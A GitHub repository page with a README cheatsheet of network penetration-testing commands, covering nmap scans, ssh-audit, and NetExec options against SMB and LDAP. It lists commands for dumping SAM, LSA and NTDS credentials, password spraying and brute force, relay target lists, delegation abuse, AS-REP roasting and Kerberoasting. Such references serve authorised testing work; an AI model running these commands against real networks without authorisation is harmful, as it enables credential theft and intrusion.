Skip to content

rafaelbaldasso/Network-Pentest

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
README.md
README.md
 
 

Repository files navigation

OpenVPN

openvpn FILE.ovpn --auth-user-pass creds.txt

Nmap

nmap -sSV -Pn -n -g 53 --open -p- -e tun0 -iL ips.txt

# Validar LDAP
nmap -sSV -Pn -p 389 --script ldap-rootdse IP

SSH

ssh-audit -T hosts.txt | egrep "\(gen\) target|\(gen\) software|\(cve\)" >> ssh.txt

# Validate the file and remove the IPs and versions with no CVEs

cat ssh.txt | egrep "target|software" | cut -d ' ' -f3,4 | paste -d " " - - | sort -k3,3 | sed 's/ / - /'
cat ssh.txt | grep cve | cut -d ' ' -f2 | sort -u

Netexec

smb, ssh, ldap, rdp, wmi, ftp, nfs, vnc, winrm, mssql

# SMB
nxc smb IP/MASK
nxc smb IP/MASK -u "DOMAIN/USER" -p "PASS" (domain user)
nxc smb IP/MASK -d "DOMAIN" -u "USER" -p "PASS" (domain user)
nxc smb IP/MASK -u "USER" -p "PASS" --local-auth (local user)
nxc smb IP/MASK -u '' -p '' (null)
nxc smb IP/MASK -u 'a' -p '' (guest)
-u "USER" -H "LM:NT" (NTLM Hash)
-u "USER" -H "NT" (NT Hash)
--shares
--shares --filter-shares READ WRITE
--interfaces
--disks
--loggedon-users
--pass-pol
--users
--groups
--local-group
--sessions
--sam
--lsa
--ntds
--gen-relay-list relay.txt (SMB Relay - signing:False)
--rid-brute (brute force em RIDs)
-M enum_av
-u users.txt -p "PASS" -d "DOMAIN" --continue-on-success (password spraying)
-u "USER" -p pass.txt --continue-on-success (brute force)
-u users.txt -p pass.txt --continue-on-success (brute force all users all passwords)
-u users.txt -p users.txt --no-bruteforce --continue-on-success (brute force username:username)
-u users.txt -p pass.txt --no-bruteforce --continue-on-success (spraying user1=pass1, user2=pass2)
-u "USER" -p "PASS" --delegate Administrator (RBCD - msDS-AllowedToActOnBehalfOfOtherIdentity - impersonate local Administrator)
-u 'HOST$' -H "HASH" --delegate Administrator --self (S4U2Self - using a computer account)

nxc smb IP/MASK | grep "signing:False" (signing:False)
nxc smb IP/MASK | grep "SMBv1:True" (SMBv1 enabled)

# LDAP
--dc-list
--users
--password-not-required
--pass-pol
--asreproast hashes.txt
--kerberoasting hashes.txt
--bloodhound -c COLLECTION (Group, LocalAdmin, Session, Trusts, Default, DCOnly, DCOM, RDP, PSRemote, LoggedOn, Container, ObjectProps, ACL, All)

smbclient

smbclient \\\\IP\\SHARE -U 'DOMAIN\USER' --password='PASS'

Windows tools

Advanced IP Scanner
PingCastle
PuTTY
WinSCP
NP++
DBeaver

About

Network Pentest commands cheatsheet

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository